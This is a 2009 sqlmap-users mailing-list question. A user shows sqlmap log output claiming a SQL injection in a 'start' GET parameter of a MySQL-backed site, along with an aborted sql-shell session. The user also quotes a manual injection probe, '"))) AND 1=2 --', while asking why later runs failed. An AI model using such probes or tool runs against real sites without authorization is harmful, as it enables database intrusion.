[sqlmap-users] Odd resutls
Brought to you by:
inquisb
From: Konrads S. <ko...@sm...> - 2009-05-08 20:06:10
|
Hi, sqlmap reported on a injection like this: [22:21:30] [INFO] GET parameter 'start' is double quoted string injectable with 3 parenthesis [22:21:30] [INFO] testing for parenthesis on injectable parameter [22:21:38] [INFO] the injectable parameter requires 3 parenthesis [22:21:38] [INFO] testing MySQL [22:21:41] [INFO] confirming MySQL [22:21:44] [INFO] retrieved: [22:21:53] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS web application technology: Apache 2.2.3, PHP 5.1.6 back-end DBMS: MySQL < 5.0.0 [22:21:53] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER sql-shell> show tables; do you want to retrieve the SQL statement output? [Y/n] [22:22:05] [INFO] fetching None query output: 'show%20tables%3B' [22:22:05] [INFO] retrieved: �^C [22:22:39] [ERROR] user aborted However, repeat attempts invoking same parameters failed. What could have happened? I can't really confirm the vuln manually either, I tried "))) AND 1=2 -- Konrads Smelkovs Applied IT sorcery. |